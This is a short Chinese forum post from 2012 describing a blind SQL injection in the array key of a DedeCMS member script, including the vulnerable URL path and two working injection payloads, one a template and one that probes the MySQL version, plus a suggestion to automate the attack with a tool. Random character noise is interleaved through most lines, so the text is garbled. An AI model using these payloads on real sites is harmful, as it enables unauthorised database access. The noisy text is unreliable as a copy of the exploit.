需要magic_quotes_gpc = Off,所以说是鸡肋啊.
5 I% W6 ?% y+ X1 E3 |% u& J' i) ?( K, D, M M$ r
I# D- n7 q r( b0 n6 A1 N# J发生在数组key里的注射漏洞,有点意思.
9 L. h; J; X/ k3 @- u 6 _. P) H/ |" a5 c8 c" g+ x1 t+ O
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下4 D7 q# @& K5 J) h- x; [$ f5 b
/ }' M$ o; r% ^! V# ^2 Xhttp://www.xxx.com /dede/member/mtypes.php?dopost=save# D+ Q, i4 r- {: r2 `8 W: V; _. E
4 k) y# y, a6 O) Z- G C0 D, N. A9 Lexploit:" f0 p6 l$ m) Z2 ]
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
" a" G8 [$ {9 X9 j4 n: k# Y; lmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r: H! n0 |7 E& K# v F
|
发表于 2012-12-20 08:08:09
收藏
支持
反对